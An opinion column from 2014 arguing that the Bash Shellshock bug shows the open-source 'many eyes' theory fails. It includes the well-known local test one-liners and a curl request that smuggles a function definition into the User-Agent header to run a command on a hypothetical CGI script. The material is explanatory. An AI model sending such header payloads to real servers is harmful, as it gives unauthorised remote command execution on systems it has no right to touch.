
Wednesday, October 1, 2014

Shellshock proves open source's 'many eyes' can't see straight

With so many people looking at open source code, its security flaws should be stopped dead -- but it doesn't work that way.


Can we do it? Can we once and for all declare the "many eyes" theory dead?
I'm a huge fan of open source. I have been since the days we called it freeware. I run OpenBSD and many other specialized open source distros, and I couldn't do my job as a computer security consultant without a small arsenal of open source tools.

That said, I've always called BS on the idea that because anyone can review open source code, it will always be more secure than closed source software. Even before the Bash Shellshock vulnerability supplied the latest counterexample, the "many eyes" theory was fatally flawed.
In a nutshell: Just because something can be done doesn't mean it will be done.

Hiding in plain sight

Let's start with the security hole du jour. Bash was released in 1989, and the recently discovered vulnerability has been around since the beginning. We're talking about an easy-to-see, easy-to-exploit bug in software used by millions of people -- one that kicked around for two-plus decades without detection.
The Bash shell is present on nearly every Linux, Unix, and BSD distribution. Even if you've applied the most recent Bash patches (released on Sept. 25) meant to close the Shellshock vulnerability, you're still vulnerable: the initial fix proved incomplete, and follow-on parser bugs such as CVE-2014-7169 surfaced almost immediately.
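If you want to check a system yourself, the widely circulated one-liners below exercise both the original hole and the incomplete first patch. Consider them a quick sketch, not a substitute for your vendor's guidance:

    # Test for the original bug (CVE-2014-6271). A vulnerable Bash
    # prints "vulnerable" before "this is a test".
    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

    # Test for the incomplete-patch follow-on (CVE-2014-7169). On a
    # vulnerable Bash, this drops a file named "echo" into the current
    # directory containing the output of the date command.
    cd /tmp && rm -f echo
    env X='() { (a)=>\' bash -c "echo date"; cat echo
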
Some people, including InfoWorld's Paul Venezia, are declaring Shellshock to be far worse than the last "big one," the April 2014 OpenSSL Heartbleed vulnerability. Heartbleed lurked in OpenSSL for more than two years before anyone noticed.
Heartbleed was bad, but Shellshock is vastly worse. Bash is installed and active on more systems than Heartbleed's OpenSSL, and Shellshock can do far more to vulnerable systems (remote execution versus information disclosure).
The real risk is in the number of systems that are remotely exploitable by unauthenticated users. Already tens of millions of Internet-facing servers have been probed for the vulnerability, and by many estimates, Shellshock is on 30 to 50 percent of all Web servers worldwide. A Web developer at one large company told me that Shellshock was easily remotely exploitable on nearly 100 percent of his servers. Ouch!
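The remote vector is depressingly simple. A Web server that hands a request to a Bash CGI script copies the HTTP headers into environment variables, which is exactly where Shellshock lives. Below is a sketch of the sort of probe the scanners have been firing; the host and /cgi-bin/ path are hypothetical:

    # The User-Agent header becomes the HTTP_USER_AGENT environment
    # variable inside the CGI process. If that process is a vulnerable
    # Bash, everything after the function definition runs on the server.
    curl -A '() { :;}; echo Content-Type: text/plain; echo; /bin/id' \
        http://www.example.com/cgi-bin/status.sh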

Who has time to review code?

The "many eyes" theory should have died a long time ago. Literally hundreds of open source bugs have been found years to decades after they were coded into popular open source software. The theory doesn't work because security code review is hard, mostly boring work. Those who do it well are probably being paid to do it for a living, and they don't have time to peruse every bit of open source code on the Internet.

Even if a trained computer security code reviewer wanted to review the most popular open source code -- could they? Linux itself, even before you add a single daemon or app, has more than 15 million lines of code. In fact, I bet most people wouldn't have time to properly review the 10,239 lines of code in Linus Torvalds' original September 1991 version. Today, some popular Linux distros total hundreds of millions of lines of code. Good luck reviewing that in your spare time.
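Don't take my word on the scale; if you have a kernel source tree checked out, the numbers are easy to approximate (the linux/ path below is illustrative):

    # Rough count of C source and header lines in a kernel tree.
    # Ignores build scripts, docs, and other languages, so treat the
    # result as an approximation, not a formal SLOC count.
    find linux/ \( -name '*.c' -o -name '*.h' \) -print0 | xargs -0 cat | wc -l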

Crowdsourcing doesn't work

Some open source authorities have tried to crowdsource the problem, only to watch interest fizzle. One of the most valiant attempts, the Sardonix security auditing project, launched about a decade ago and failed: a few individuals, along with a college classroom or two, pitched in before the effort quietly died from low participation.
Sometimes a commercial group or the military will get involved, but their examinations are fairly limited in scope. Even if they find bugs, their suggestions and recommendations often come under suspicion. You might wonder why anyone would object to the military fixing open source software -- until you recall episodes like Dual_EC_DRBG, the NSA-designed random number generator that NIST standardized and that is widely suspected of harboring a deliberate backdoor.

Fixing the bugs creates its own problems

Even if a serious, independent, trusted security team starts reviewing smaller pieces of code -- say, a particular service or application, such as OpenSSL -- it usually results in fragmentation or forking of the code base. (Heartbleed provides a salient example: it spawned the LibreSSL and BoringSSL forks of OpenSSL.)
In other words, the fix results in different versions of code that don't always support each other. It also means two or more versions have to be reviewed every time a change is made. This is no way to mitigate the overall risk.

Where's the proof?

Last but not least, there's no proof that open source software has fewer bugs than closed source, nor that more people finding more bugs results in less security risk. The total number of publicly known exploits across all software continues to rise, and the number of people exploited worldwide continues to grow.
If "many eyes" worked, you'd expect to see a decrease in the number of bugs found over time, especially in software that has been out a while. You would expect open source software to be less exploitable than closed source software. But more to the point, from a scientific viewpoint, no independent study has proven that open source software has led to fewer exploits or fewer exploited customers.
The Shellshock vulnerability in Bash is the latest counterexample. Let it serve as a reminder that, logically, the "many eyes" theory was never on firm ground, and recent events have made its flaws more glaring than ever.

